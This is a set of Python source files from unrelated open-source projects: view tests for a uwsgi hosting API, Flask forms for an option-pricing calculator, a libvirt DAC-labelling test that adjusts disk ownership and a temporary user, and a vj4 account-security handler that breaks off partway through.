self.assertEqual(response.status_code, 200)
def test_net_rx(self):
response = self.logged_get_response_for_view('/metrics/container.net.rx/1', metrics_container_net_rx, {'id': self.c_uid})
self.assertEqual(response.status_code, 200)
def test_net_tx(self):
response = self.logged_get_response_for_view('/metrics/container.net.tx/1', metrics_container_net_tx, {'id': self.c_uid})
self.assertEqual(response.status_code, 200)
def test_cpu(self):
response = self.logged_get_response_for_view('/metrics/container.cpu/1', metrics_container_cpu, {'id': self.c_uid})
self.assertEqual(response.status_code, 200)
def test_mem(self):
response = self.logged_get_response_for_view('/metrics/container.mem/1', metrics_container_mem, {'id': self.c_uid})
self.assertEqual(response.status_code, 200)
def test_quota(self):
response = self.logged_get_response_for_view('/metrics/container.quota/1', metrics_container_quota, {'id': self.c_uid})
self.assertEqual(response.status_code, 200)
def test_domain_net_rx(self):
        response = self.logged_get_response_for_view('/metrics/domain.net.rx/1', metrics_domain_net_rx, {'id': self.domain.pk})
self.assertEqual(response.status_code, 200)
def test_domain_net_tx(self):
        response = self.logged_get_response_for_view('/metrics/domain.net.tx/1', metrics_domain_net_tx, {'id': self.domain.pk})
self.assertEqual(response.status_code, 200)
def test_domain_hits(self):
response = self.logged_get_response_for_view('/metrics/domain.hits/1', metrics_domain_hits, {'id': self.domain.pk})
self.assertEqual(response.status_code, 200)
class PrivateViewsTest(ViewsTest):
def test_containers(self):
response = self.logged_get_response_for_view('/private/containers/', private_containers)
self.assertEqual(response.status_code, 200)
def test_container(self):
response = self.logged_get_response_for_view('/private/containers/1.ini', private_container_ini, {'id': 1})
self.assertEqual(response.status_code, 403)
def test_legion_nodes(self):
response = self.logged_get_response_for_view('/private/legion/nodes/', private_legion_nodes)
self.assertEqual(response.status_code, 403)
def test_nodes(self):
response = self.logged_get_response_for_view('/private/nodes', private_nodes)
self.assertEqual(response.status_code, 200)
def test_domains_rsa(self):
response = self.logged_get_response_for_view('/private/domains/rsa/', private_domains_rsa)
self.assertEqual(response.status_code, 200)
    def test_custom_services(self):
response = self.logged_get_response_for_view('/private/custom_services/', private_custom_services)
self.assertEqual(response.status_code, 200)
def test_io_read(self):
response = self.logged_get_response_for_view('/private/metrics/container.io.read/1', private_metrics_container_io_read, {'id': self.c_uid})
self.assertEqual(response.status_code, 405)
def test_io_write(self):
response = self.logged_get_response_for_view('/private/metrics/container.io.write/1', private_metrics_container_io_write, {'id': self.c_uid})
self.assertEqual(response.status_code, 405)
def test_net_rx(self):
response = self.logged_get_response_for_view('/private/metrics/container.net.rx/1', private_metrics_container_net_rx, {'id': self.c_uid})
self.assertEqual(response.status_code, 405)
def test_net_tx(self):
response = self.logged_get_response_for_view('/private/metrics/container.net.tx/1', private_metrics_container_net_tx, {'id': self.c_uid})
self.assertEqual(response.status_code, 405)
def test_cpu(self):
response = self.logged_get_response_for_view('/private/metrics/container.cpu/1', private_metrics_container_cpu, {'id': self.c_uid})
self.assertEqual(response.status_code, 405)
def test_mem(self):
response = self.logged_get_response_for_view('/private/metrics/container.mem/1', private_metrics_container_mem, {'id': self.c_uid})
self.assertEqual(response.status_code, 405)
def test_quota(self):
response = self.logged_get_response_for_view('/private/metrics/container.quota/1', private_metrics_container_quota, {'id': self.c_uid})
self.assertEqual(response.status_code, 405)
def test_domain_net_rx(self):
        response = self.logged_get_response_for_view('/private/metrics/domain.net.rx/1', private_metrics_domain_net_rx, {'id': self.c_uid})
self.assertEqual(response.status_code, 405)
def test_domain_net_tx(self):
        response = self.logged_get_response_for_view('/private/metrics/domain.net.tx/1', private_metrics_domain_net_tx, {'id': self.c_uid})
self.assertEqual(response.status_code, 405)
def test_domain_hits(self):
response = self.logged_get_response_for_view('/private/metrics/domain.hits/1', private_metrics_domain_hits, {'id': self.c_uid})
self.assertEqual(response.status_code, 405)
| Mikrobit/uwsgi.it | uwsgi_it_api/uwsgi_it_api/tests.py | Python | mit | 16,887 |
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, BooleanField, SubmitField, \
FloatField, RadioField, SelectField, IntegerField
from wtforms.validators import InputRequired, Required, Length, Email, Regexp, EqualTo, DataRequired
from wtforms import ValidationError
from ..models import User
from flask_table import Table, Col
class pyOptionHomeForm(FlaskForm):
optionStyle = SelectField('style',
choices=[('European','European'),
('BullSpread','BullSpread'),
('BullSpreadPathN','BullSpreadPathN'),
('DoubleNoTouch','DoubleNoTouch'),
('OutOfRangeRate','OutOfRangeRate'),
('DownAndOutAlternative','DownAndOutAlternative'),
('ModerateOption','ModerateOption')], validators=[DataRequired()])
optionType = SelectField('type',
choices=[('call','call'), ('put', 'put')], validators=[DataRequired()])
S0 = FloatField('S0', validators=[InputRequired()])
K = FloatField('K', validators=[InputRequired()])
K1 = FloatField('K1', validators=[InputRequired()])
K2 = FloatField('K2', validators=[InputRequired()])
T = FloatField('T', validators=[InputRequired()])
r = FloatField('r', validators=[InputRequired()])
q = FloatField('q', validators=[InputRequired()])
sigma = FloatField('sigma', validators=[InputRequired()])
N = IntegerField('N', validators=[InputRequired()])
Rp = FloatField('Rp', validators=[InputRequired()])
I = IntegerField('I (MC)', validators=[InputRequired()])
M = IntegerField('M (MC)', validators=[InputRequired()])
seedNum = IntegerField('seed (MC)', validators=[InputRequired()])
submit = SubmitField('Calculate')
class pyOptionForm(FlaskForm):
optionStyle = SelectField('style',
choices=[('European','European'),
('BullSpread','BullSpread'),
('BullSpreadPathN','BullSpreadPathN'),
('DoubleNoTouch','DoubleNoTouch'),
('OutOfRangeRate','OutOfRangeRate'),
('DownAndOutAlternative','DownAndOutAlternative'),
('ModerateOption','ModerateOption')], validators=[DataRequired()])
optionType = SelectField('type',
choices=[('call','call'), ('put', 'put')], validators=[DataRequired()])
S0 = FloatField('S0', validators=[InputRequired()])
K = FloatField('K', validators=[InputRequired()])
K1 = FloatField('K1', validators=[InputRequired()])
K2 = FloatField('K2', validators=[InputRequired()])
T = FloatField('T', validators=[InputRequired()])
r = FloatField('r', validators=[InputRequired()])
q = FloatField('q', validators=[InputRequired()])
sigma = FloatField('sigma', validators=[InputRequired()])
N = IntegerField('N', validators=[InputRequired()])
Rp = FloatField('Rp', validators=[InputRequired()])
I = IntegerField('I (MC)', validators=[InputRequired()])
M = IntegerField('M (MC)', validators=[InputRequired()])
seedNum = IntegerField('seed (MC)', validators=[InputRequired()])
submit = SubmitField('Calculate')
class BsmForm(FlaskForm):
S0 = FloatField('S0', validators=[InputRequired()])
K = FloatField('K', validators=[InputRequired()])
T = FloatField('T', validators=[InputRequired()])
r = FloatField('r', validators=[InputRequired()])
q = FloatField('q', validators=[InputRequired()])
sigma = FloatField('sigma', validators=[InputRequired()])
optionType = SelectField('type', choices=[('call','call'), ('put', 'put')], validators=[DataRequired()])
submit = SubmitField('Calculate')
def validate_S0(self, field):
if field.data < 0:
raise ValidationError('S0 > 0')
def validate_K(self, field):
if field.data < 0:
raise ValidationError('K > 0')
def validate_T(self, field):
if field.data < 0:
raise ValidationError('T > 0')
def validate_r(self, field):
if field.data < 0:
raise ValidationError('r > 0')
def validate_q(self, field):
if field.data < 0:
raise ValidationError('q > 0')
def validate_sigma(self, field):
if field.data <= 0:
raise ValidationError('sigma > 0')
def validate_optionType(self, field):
if field.data not in ['call','put']:
raise ValidationError('option type error')
class BullSpreadForm(FlaskForm):
S0 = FloatField('S0', validators=[InputRequired()])
K1 = FloatField('K1', validators=[InputRequired()])
K2 = FloatField('K2', validators=[InputRequired()])
T = FloatField('T', validators=[InputRequired()])
r = FloatField('r', validators=[InputRequired()])
q = FloatField('q', validators=[InputRequired()])
sigma = FloatField('sigma', validators=[InputRequired()])
optionType = SelectField('type', choices=[('call','call'), ('put', 'put')], validators=[DataRequired()])
submit = SubmitField('Calculate')
def validate_S0(self, field):
if field.data < 0:
raise ValidationError('S0 > 0')
def validate_K1(self, field):
if field.data < 0:
raise ValidationError('K1 > 0')
def validate_K2(self, field):
if field.data < 0:
raise ValidationError('K2 > 0')
def validate_T(self, field):
if field.data < 0:
raise ValidationError('T > 0')
def validate_r(self, field):
if field.data < 0:
raise ValidationError('r > 0')
def validate_q(self, field):
if field.data < 0:
raise ValidationError('q > 0')
def validate_sigma(self, field):
if field.data <= 0:
raise ValidationError('sigma > 0')
def validate_optionType(self, field):
if field.data not in ['call','put']:
raise ValidationError('option type error')
class OptionMCSForm1(FlaskForm):
S0 = FloatField('S0', validators=[InputRequired()])
K1 = FloatField('K1', validators=[InputRequired()])
K2 = FloatField('K2', validators=[InputRequired()])
T = FloatField('T', validators=[InputRequired()])
r = FloatField('r', validators=[InputRequired()])
q = FloatField('q', validators=[InputRequired()])
sigma = FloatField('sigma', validators=[InputRequired()])
N = IntegerField('N', validators=[InputRequired()])
optionType = SelectField('type', choices=[('call','call'), ('put', 'put')], validators=[DataRequired()])
optionStyle = SelectField('style',
choices=[('BullSpreadPathN','BullSpreadPathN')], validators=[DataRequired()])
I = IntegerField('I (MC)', validators=[InputRequired()])
M = IntegerField('M (MC)', validators=[InputRequired()])
seedNum = IntegerField('seed (MC)', validators=[InputRequired()])
submit = SubmitField('Calculate')
def validate_S0(self, field):
if field.data < 0:
raise ValidationError('S0 >= 0')
def validate_K1(self, field):
if field.data < 0:
raise ValidationError('K1 >= 0')
def validate_K2(self, field):
if field.data < 0:
raise ValidationError('K2 >= 0')
def validate_T(self, field):
if field.data <= 0:
raise ValidationError('T > 0')
def validate_r(self, field):
if field.data < 0:
raise ValidationError('r >= 0')
def validate_q(self, field):
if field.data < 0:
raise ValidationError('q >= 0')
def validate_sigma(self, field):
if field.data <= 0:
raise ValidationError('sigma > 0')
def validate_N(self, field):
if field.data <= 0:
raise ValidationError('N > 0')
def validate_optionType(self, field):
if field.data not in ['call','put']:
raise ValidationError('option type error')
def validate_optionStyle(self, field):
if field.data not in ['BullSpreadPathN']:
raise ValidationError('option style error')
def validate_I(self, field):
if field.data < 0:
raise ValidationError('I > 0')
def validate_M(self, field):
if field.data <= 0:
raise ValidationError('M > 0')
def validate_seedNum(self, field):
if field.data < 0:
raise ValidationError('seed > 0')
class OptionMCSForm2(FlaskForm):
S0 = FloatField('S0', validators=[InputRequired()])
K1 = FloatField('K1', validators=[InputRequired()])
K2 = FloatField('K2', validators=[InputRequired()])
T = FloatField('T', validators=[InputRequired()])
r = FloatField('r', validators=[InputRequired()])
q = FloatField('q', validators=[InputRequired()])
sigma = FloatField('sigma', validators=[InputRequired()])
Rp = FloatField('Rp', validators=[InputRequired()])
optionType = SelectField('type', choices=[('call','call'), ('put', 'put')], validators=[DataRequired()])
optionStyle = SelectField('style',
choices=[('DoubleNoTouch','DoubleNoTouch'),
('OutOfRangeRate','OutOfRangeRate')], validators=[DataRequired()])
I = IntegerField('I (MC)', validators=[InputRequired()])
M = IntegerField('M (MC)', validators=[InputRequired()])
seedNum = IntegerField('seed (MC)', validators=[InputRequired()])
submit = SubmitField('Calculate')
def validate_S0(self, field):
if field.data < 0:
raise ValidationError('S0 >= 0')
def validate_K1(self, field):
if field.data < 0:
raise ValidationError('K1 >= 0')
def validate_K2(self, field):
if field.data < 0:
raise ValidationError('K2 >= 0')
def validate_T(self, field):
if field.data <= 0:
raise ValidationError('T > 0')
def validate_r(self, field):
if field.data < 0:
raise ValidationError('r >= 0')
def validate_q(self, field):
if field.data < 0:
raise ValidationError('q >= 0')
def validate_sigma(self, field):
if field.data <= 0:
raise ValidationError('sigma > 0')
def validate_Rp(self, field):
if field.data < 0:
raise ValidationError('Rp >= 0')
def validate_optionType(self, field):
if field.data not in ['call','put']:
raise ValidationError('option type error')
def validate_optionStyle(self, field):
if field.data not in ['DoubleNoTouch','OutOfRangeRate']:
raise ValidationError('option style error')
def validate_I(self, field):
if field.data < 0:
raise ValidationError('I > 0')
def validate_M(self, field):
if field.data <= 0:
raise ValidationError('M > 0')
def validate_seedNum(self, field):
if field.data < 0:
raise ValidationError('seed > 0')
class OptionMCSForm3(FlaskForm):
S0 = FloatField('S0', validators=[InputRequired()])
K = FloatField('K', validators=[InputRequired()])
T = FloatField('T', validators=[InputRequired()])
r = FloatField('r', validators=[InputRequired()])
q = FloatField('q', validators=[InputRequired()])
sigma = FloatField('sigma', validators=[InputRequired()])
Rp = FloatField('Rp', validators=[InputRequired()])
optionType = SelectField('type', choices=[('call','call'), ('put', 'put')], validators=[DataRequired()])
optionStyle = SelectField('style',
choices=[('DownAndOutAlternative','DownAndOutAlternative'),
('ModerateOption','ModerateOption')], validators=[DataRequired()])
I = IntegerField('I (MC)', validators=[InputRequired()])
M = IntegerField('M (MC)', validators=[InputRequired()])
seedNum = IntegerField('seed (MC)', validators=[InputRequired()])
submit = SubmitField('Calculate')
def validate_S0(self, field):
if field.data < 0:
raise ValidationError('S0 >= 0')
def validate_K(self, field):
if field.data < 0:
            raise ValidationError('K >= 0')
def validate_T(self, field):
if field.data <= 0:
raise ValidationError('T > 0')
def validate_r(self, field):
if field.data < 0:
raise ValidationError('r >= 0')
def validate_q(self, field):
if field.data < 0:
raise ValidationError('q >= 0')
def validate_sigma(self, field):
if field.data <= 0:
raise ValidationError('sigma > 0')
def validate_Rp(self, field):
if field.data < 0:
raise ValidationError('Rp >= 0')
def validate_optionType(self, field):
if field.data not in ['call','put']:
raise ValidationError('option type error')
def validate_optionStyle(self, field):
if field.data not in ['DownAndOutAlternative','ModerateOption']:
raise ValidationError('option style error')
def validate_I(self, field):
if field.data < 0:
raise ValidationError('I > 0')
def validate_M(self, field):
if field.data <= 0:
raise ValidationError('M > 0')
def validate_seedNum(self, field):
if field.data < 0:
raise ValidationError('seed > 0')
class ItemTable(Table):
classes = ['table','table-striped']
name = Col('name')
valuation = Col('valuation')
ratio = Col('ratio (v/S0)')
| lyhrobin00007/FlaskCTA | app/pyOption/forms.py | Python | mit | 13,561 |
import os
import stat
import pwd
import grp
import logging
from autotest.client import utils
from autotest.client.shared import error
from virttest import utils_selinux
from virttest import virt_vm
from virttest import utils_config
from virttest import utils_libvirtd
from virttest.libvirt_xml.vm_xml import VMXML
def check_qemu_grp_user(user):
"""
    Check that the given user exists and is in the 'qemu' group.
:param user: given user name or id
:return: True or False
"""
try:
# check the user exist or not
user_id = None
user_name = None
try:
user_id = int(user)
except ValueError:
user_name = user
if user_id:
pw_user = pwd.getpwuid(user_id)
else:
pw_user = pwd.getpwnam(user_name)
user_name = pw_user.pw_name
# check the user is in 'qemu' group
grp_names = []
for g in grp.getgrall():
if user_name in g.gr_mem:
grp_names.append(g.gr_name)
grp_names.append(str(g.gr_gid))
if "qemu" in grp_names:
return True
else:
            err_msg = "The given user: %s exists " % user
            err_msg += "but is not in the 'qemu' group."
raise error.TestFail(err_msg)
except KeyError:
return False
def format_user_group_str(user, group):
"""
Check given user and group, then return "uid:gid" string
:param user: given user name or id string
:param group: given group name or id string
:return: "uid:gid" string
"""
try:
user_id = int(user)
except ValueError:
try:
user_id = pwd.getpwnam(user).pw_uid
except KeyError:
            # a nonexistent user will definitely fail to start the domain; log a
            # warning here and let the test continue
logging.warning("the user name: %s not found on host" % user)
user_id = user
try:
grp_id = int(group)
except ValueError:
try:
grp_id = grp.getgrnam(group).gr_gid
except KeyError:
            # a nonexistent group name will fail to start the vm; only log a warning
            # here and let the test continue
logging.warning("the group name: %s not found on host" % group)
grp_id = group
label_str = "%s:%s" % (user_id, grp_id)
return label_str
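# Illustrative examples for the helper above (values typical of a Linux host, shown
# for orientation only; they are not taken from the test suite):
#   format_user_group_str("root", "root")  -> "0:0"     (names resolved via pwd/grp)
#   format_user_group_str("107", "107")    -> "107:107" (numeric strings used as-is)
# Unknown names only produce a warning and are passed through unchanged.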
def run(test, params, env):
"""
Test DAC setting in both domain xml and qemu.conf.
(1) Init variables for test.
(2) Set VM xml and qemu.conf with proper DAC label, also set image and
        monitor socket parent dir with proper ownership and mode.
(3) Start VM and check the context.
(4) Destroy VM and check the context.
"""
# Get general variables.
status_error = ('yes' == params.get("status_error", 'no'))
host_sestatus = params.get("dac_start_destroy_host_selinux", "enforcing")
qemu_group_user = "yes" == params.get("qemu_group_user", "no")
# Get variables about seclabel for VM.
sec_type = params.get("dac_start_destroy_vm_sec_type", "dynamic")
sec_model = params.get("dac_start_destroy_vm_sec_model", "dac")
sec_label = params.get("dac_start_destroy_vm_sec_label", None)
sec_relabel = params.get("dac_start_destroy_vm_sec_relabel", "yes")
security_default_confined = params.get("security_default_confined", None)
set_process_name = params.get("set_process_name", None)
sec_dict = {'type': sec_type, 'model': sec_model, 'relabel': sec_relabel}
if sec_label:
sec_dict['label'] = sec_label
set_sec_label = "yes" == params.get("set_sec_label", "no")
set_qemu_conf = "yes" == params.get("set_qemu_conf", "no")
# Get qemu.conf config variables
qemu_user = params.get("qemu_user", None)
qemu_group = params.get("qemu_group", None)
dynamic_ownership = "yes" == params.get("dynamic_ownership", "yes")
# Get variables about VM and get a VM object and VMXML instance.
vm_name = params.get("main_vm")
vm = env.get_vm(vm_name)
vmxml = VMXML.new_from_inactive_dumpxml(vm_name)
backup_xml = vmxml.copy()
    # Get variables about image.
img_label = params.get('dac_start_destroy_disk_label')
# Label the disks of VM with img_label.
disks = vm.get_disk_devices()
backup_labels_of_disks = {}
qemu_disk_mod = False
for disk in disks.values():
disk_path = disk['source']
f = os.open(disk_path, 0)
stat_re = os.fstat(f)
backup_labels_of_disks[disk_path] = "%s:%s" % (stat_re.st_uid,
stat_re.st_gid)
label_list = img_label.split(":")
os.chown(disk_path, int(label_list[0]), int(label_list[1]))
os.close(f)
st = os.stat(disk_path)
if not bool(st.st_mode & stat.S_IWGRP):
            # add group write mode to disk by chmod g+w
os.chmod(disk_path, st.st_mode | stat.S_IWGRP)
qemu_disk_mod = True
# Set selinux of host.
backup_sestatus = utils_selinux.get_status()
utils_selinux.set_status(host_sestatus)
def _create_user():
"""
        Create a "vdsm_fake" user in the 'qemu' group for the test
"""
logging.debug("create a user 'vdsm_fake' in 'qemu' group")
cmd = "useradd vdsm_fake -G qemu -s /sbin/nologin"
utils.run(cmd, ignore_status=False)
create_qemu_user = False
qemu_sock_mod = False
qemu_sock_path = '/var/lib/libvirt/qemu/'
qemu_conf = utils_config.LibvirtQemuConfig()
libvirtd = utils_libvirtd.Libvirtd()
try:
# Check qemu_group_user
if qemu_group_user:
if set_qemu_conf:
if "EXAMPLE" in qemu_user:
if not check_qemu_grp_user("vdsm_fake"):
_create_user()
create_qemu_user = True
qemu_user = "vdsm_fake"
qemu_group = "qemu"
if set_sec_label:
if sec_label:
if "EXAMPLE" in sec_label:
if not check_qemu_grp_user("vdsm_fake"):
_create_user()
create_qemu_user = True
sec_label = "vdsm_fake:qemu"
sec_dict['label'] = sec_label
st = os.stat(qemu_sock_path)
if not bool(st.st_mode & stat.S_IWGRP):
# chmod g+w
os.chmod(qemu_sock_path, st.st_mode | stat.S_IWGRP)
qemu_sock_mod = True
if set_qemu_conf:
# Transform qemu user and group to "uid:gid"
qemu_user = qemu_user.replace("+", "")
qemu_group = qemu_group.replace("+", "")
qemu_conf_label_trans = format_user_group_str(qemu_user, qemu_group)
# Set qemu.conf for user and group
if qemu_user:
qemu_conf.user = qemu_user
if qemu_group:
qemu_conf.group = qemu_group
if dynamic_ownership:
qemu_conf.dynamic_ownership = 1
else:
qemu_conf.dynamic_ownership = 0
if security_default_confined:
qemu_conf.security_default_confined = security_default_confined
if set_process_name:
qemu_conf.set_process_name = set_process_name
logging.debug("the qemu.conf content is: %s" % qemu_conf)
libvirtd.restart()
if set_sec_label:
# Transform seclabel to "uid:gid"
if sec_label:
sec_label = sec_label.replace("+", "")
if ":" in sec_label:
user, group = sec_label.split(":")
sec_label_trans = format_user_group_str(user, group)
# Set the context of the VM.
logging.debug("sec_dict is %s" % sec_dict)
vmxml.set_seclabel([sec_dict])
vmxml.sync()
logging.debug("updated domain xml is: %s" % vmxml.xmltreefile)
# Start VM to check the qemu process and image.
try:
vm.start()
# Start VM successfully.
# VM with seclabel can access the image with the context.
if status_error:
raise error.TestFail("Test succeeded in negative case.")
# Get vm process label when VM is running.
vm_pid = vm.get_pid()
pid_stat = os.stat("/proc/%d" % vm_pid)
vm_process_uid = pid_stat.st_uid
vm_process_gid = pid_stat.st_gid
vm_context = "%s:%s" % (vm_process_uid, vm_process_gid)
# Get vm image label when VM is running
f = os.open(disks.values()[0]['source'], 0)
stat_re = os.fstat(f)
disk_context = "%s:%s" % (stat_re.st_uid, stat_re.st_gid)
os.close(f)
# Check vm process and image DAC label after vm start
if set_sec_label and sec_label:
if ":" in sec_label:
if vm_context != sec_label_trans:
                        raise error.TestFail("Label of VM process is not "
"expected after starting.\nDetail:"
"vm_context=%s, sec_label_trans=%s"
% (vm_context, sec_label_trans))
if sec_relabel == "yes":
if dynamic_ownership:
if disk_context != sec_label_trans:
raise error.TestFail("Label of disk is not " +
"expected" +
" after VM starting.\n" +
"Detail: disk_context" +
"=%s" % disk_context +
", sec_label_trans=%s."
% sec_label_trans)
elif set_qemu_conf and not security_default_confined:
if vm_context != qemu_conf_label_trans:
                    raise error.TestFail("Label of VM process is not expected"
" after starting.\nDetail: vm_context="
"%s, qemu_conf_label_trans=%s"
% (vm_context, qemu_conf_label_trans))
if disk_context != qemu_conf_label_trans:
if dynamic_ownership:
raise error.TestFail("Label of disk is not expected " +
"after VM starting.\nDetail: di" +
"sk_context=%s, " % disk_context +
"qemu_conf_label_trans=%s." %
qemu_conf_label_trans)
# check vm started with -name $vm_name,process=qemu:$vm_name
if set_process_name:
chk_str = "-name %s,process=qemu:%s" % (vm_name, vm_name)
cmd = "ps -p %s -o command=" % vm_pid
result = utils.run(cmd)
if chk_str in result.stdout:
logging.debug("%s found in vm process command: %s" %
(chk_str, result.stdout))
else:
raise error.TestFail("%s not in vm process command: %s" %
(chk_str, result.stdout))
# Check the label of disk after VM being destroyed.
vm.destroy()
f = os.open(disks.values()[0]['source'], 0)
stat_re = os.fstat(f)
img_label_after = "%s:%s" % (stat_re.st_uid, stat_re.st_gid)
os.close(f)
if set_sec_label and sec_relabel == "yes":
                # With dynamic_ownership set to 1 on a non-shared fs, the current
                # domain image is restored to 0:0 when sec_relabel is enabled.
if dynamic_ownership:
if not img_label_after == "0:0":
                        raise error.TestFail("Label of disk is %s; it did not "
                                             "restore to 0:0 on VM shutdown."
                                             % img_label_after)
elif set_qemu_conf and not set_sec_label:
                # With dynamic_ownership set to 1 on a non-shared fs, the current
                # domain image is restored to 0:0 when only qemu.conf is set.
if dynamic_ownership:
if not img_label_after == "0:0":
                        raise error.TestFail("Label of disk is %s; it did not "
                                             "restore to 0:0 on VM shutdown."
                                             % img_label_after)
else:
if (not img_label_after == img_label):
raise error.TestFail("Bug: Label of disk is changed\n"
"Detail: img_label_after=%s, "
"img_label=%s.\n"
% (img_label_after, img_label))
except virt_vm.VMStartError, e:
# Starting VM failed.
# VM with seclabel can not access the image with the context.
if not status_error:
                err_msg = "Domain start failure is not due to the DAC setting, see "
err_msg += "more in https://bugzilla.redhat.com/show_bug"
err_msg += ".cgi?id=856951"
if set_sec_label:
if sec_label:
if sec_relabel == "yes" and sec_label_trans == "0:0":
if set_qemu_conf:
if qemu_conf_label_trans == "107:107":
raise error.TestNAError(err_msg)
elif sec_relabel == "no" and sec_label_trans == "0:0":
if not set_qemu_conf:
raise error.TestNAError(err_msg)
else:
raise error.TestFail("Test failed in positive case."
"error: %s" % e)
finally:
# clean up
for path, label in backup_labels_of_disks.items():
label_list = label.split(":")
os.chown(path, int(label_list[0]), int(label_list[1]))
if qemu_disk_mod:
st = os.stat(path)
os.chmod(path, st.st_mode ^ stat.S_IWGRP)
if set_sec_label:
backup_xml.sync()
if qemu_sock_mod:
st = os.stat(qemu_sock_path)
os.chmod(qemu_sock_path, st.st_mode ^ stat.S_IWGRP)
if set_qemu_conf:
qemu_conf.restore()
libvirtd.restart()
if create_qemu_user:
cmd = "userdel -r vdsm_fake"
output = utils.run(cmd, ignore_status=True)
utils_selinux.set_status(backup_sestatus)
| waynesun09/tp-libvirt | libvirt/tests/src/svirt/dac_start_destroy.py | Python | gpl-2.0 | 15,257 |
import asyncio
import hmac
import itertools
from bson import objectid
from vj4 import app
from vj4 import error
from vj4.model import builtin
from vj4.model import document
from vj4.model import domain
from vj4.model import fs
from vj4.model import message
from vj4.model import token
from vj4.model import user
from vj4.model.adaptor import setting
from vj4.model.adaptor import userfile
from vj4.handler import base
from vj4.service import bus
from vj4.util import useragent
from vj4.util import geoip
from vj4.util import misc
from vj4.util import options
from vj4.util import validator
TOKEN_TYPE_TEXTS = {
token.TYPE_SAVED_SESSION: 'Saved session',
token.TYPE_UNSAVED_SESSION: 'Temporary session',
}
@app.route('/home/security', 'home_security', global_route=True)
class HomeSecurityHandler(base.OperationHandler):
@base.require_priv(builtin.PRIV_USER_PROFILE)
async def get(self):
# TODO(iceboy): pagination? or limit session count for uid?
sessions = await token.get_session_list_by_uid(self.user['_id'])
annotated_sessions = list({
**session,
'update_ua': useragent.parse(session.get('update_ua') or
session.get('create_ua') or ''),
'update_geoip': geoip.ip2geo(session.get('update_ip') or
session.get('create_ip'),
self.get_setting('view_lang')),
'token_digest': hmac.new(b'token_digest', session['_id'], 'sha256').hexdigest(),
'is_current': session['_id'] == self.session['_id']
} for session in sessions)
self.render('home_security.html', sessions=annotated_sessions)
@base.require_priv(builtin.PRIV_USER_PROFILE)
@base.require_csrf_token
@base.sanitize
async def post_change_password(self, *,
current_password: str,
new_password: str,
verify_password: str):
if new_password != verify_password:
raise error.VerifyPasswordError()
doc = await user.change_password(self.user['_id'], current_password, new_password)
if not doc:
raise error.CurrentPasswordError(self.user['_id'])
self.json_or_redirect(self.url)
@base.require_priv(builtin.PRIV_USER_PROFILE)
@base.require_csrf_token
@base.sanitize
@base.limit_rate('send_mail', 3600, 30)
async def post_change_mail(self, *, current_password: str, mail: str):
validator.check_mail(mail)
udoc, mail_holder_udoc = await asyncio.gather(
user.check_password_by_uid(self.user['_id'], current_password),
user.get_by_mail(mail))
# TODO(twd2): raise other errors.
if not udoc:
raise error.CurrentPasswordError(self.user['uname'])
if mail_holder_udoc:
raise error.UserAlreadyExistError(mail)
rid, _ = await token.add(token.TYPE_CHANGEMAIL,
options.changemail_token_expire_seconds,
uid=udoc['_id'], mail=mail)
await self.send_mail(mail, 'Change Email', 'user_changemail_mail.html',
url=self.reverse_url('user_changemail_with_code', code=rid),
uname=udoc['uname'])
self.render('user_changemail_mail_sent.html')
@base.require_priv(builtin.PRIV_USER_PROFILE)
@base.require_csrf_token
@base.sanitize
async def post_delete_token(self, *, token_type: int, token_digest: str):
sessions = await token.get_session_list_by_uid(self.user['_id'])
for session in sessions:
if (token_type == session['token_type'] and
token_digest == hmac.new(b'token_digest', session['_id'], 'sha256').hexdigest()):
await token.delete_by_hashed_id(session['_id'], session['token_type'])
break
else:
raise error.InvalidTokenDigestError(token_type, token_digest)
self.json_or_redirect(self.url)
@base.require_priv(builtin.PRIV_USER_PROFILE)
@base.require_csrf_token
async def post_delete_all_tokens(self):
await token.delete_by_uid(self.user['_id'])
self.json_or_redirect(self.url)
@app.route('/home/security/changemail/{code}', 'user_changemail_with_code', global_route=True)
class UserChangemailWithCodeHandler(base.Handler):
@base.require_priv(builtin.PRIV_USER_PROFILE)
@base.route_argument
@base.sanitize
async def get(self, *, code: str):
tdoc = await token.get(code, token.TYPE_CHANGEMAIL)
if not tdoc or tdoc['uid'] != self.user['_id']:
raise error.InvalidTokenError(token.TYPE_CHANGEMAIL, code)
mail_holder_udoc = await user.get_by_mail(tdoc['mail'])
if mail_holder_udoc:
raise error.UserAlreadyExistError(tdoc['mail'])
# TODO(twd2): Ensure mail is unique.
await user.set_mail(self.user['_id'], tdoc['mail'])
await token.delete(code, token.TYPE_CHANGEMAIL)
self.json_or_redirect(self.reverse_url('home_security'))
@app.route('/home/account', 'home_account', global_route=True)
class HomeAccountHandler(base.Handler):
@base.require_priv(builtin.PRIV_USER_PROFILE)
async def get(self):
self.render('home_settings.html', category='account', settings=setting.ACCOUNT_SETTINGS)
@base.require_priv(builtin.PRIV_USER_PROFILE)
@base.post_argument
@base.require_csrf_token
async def post(self, **kwargs):
await self.set_settings(**kwargs)
self.json_or_redirect(self.url)
@app.route('/home/domain/account', 'home_domain_account', global_route=False)
class HomeDomainAccountHandler(base.Handler):
@base.require_priv(builtin.PRIV_USER_PROFILE)
async def get(self):
self.render('home_settings.html', category='domain_account', settings=setting.DOMAIN_ACCOUNT_SETTINGS)
@base.require_priv(builtin.PRIV_USER_PROFILE)
@base.post_argument
@base.require_csrf_token
async def post(self, **kwargs):
await self.set_settings(**kwargs)
self.json_or_redirect(self.url)
@app.route('/home/preference', 'home_preference', global_route=True)
class HomePreferenceHandler(base.Handler):
@base.require_priv(builtin.PRIV_USER_PROFILE)
async def get(self):
self.render('home_settings.html', category='preference', settings=setting.PREFERENCE_SETTINGS)
@base.require_priv(builtin.PRIV_USER_PROFILE)
@base.post_argument
@base.require_csrf_token
async def post(self, **kwargs):
await self.set_settings(**kwargs)
self.json_or_redirect(self.url)
@app.route('/home/messages', 'home_messages', global_route=True)
class HomeMessagesHandler(base.OperationHandler):
def modify_udoc(self, udict, key):
udoc = udict.get(key)
if not udoc:
return
gravatar_url = misc.gravatar_url(udoc.get('gravatar'))
if 'gravatar' in udoc and udoc['gravatar']:
udict[key] = {**udoc,
'gravatar_url': gravatar_url,
'gravatar': ''}
@base.require_priv(builtin.PRIV_USER_PROFILE)
async def get(self):
# TODO(iceboy): projection, pagination.
mdocs = await message.get_multi(self.user['_id']).sort([('_id', -1)]).limit(50).to_list()
udict = await user.get_dict(
itertools.chain.from_iterable((mdoc['sender_uid'], mdoc['sendee_uid']) for mdoc in mdocs),
fields=user.PROJECTION_PUBLIC)
# TODO(twd2): improve here:
for mdoc in mdocs:
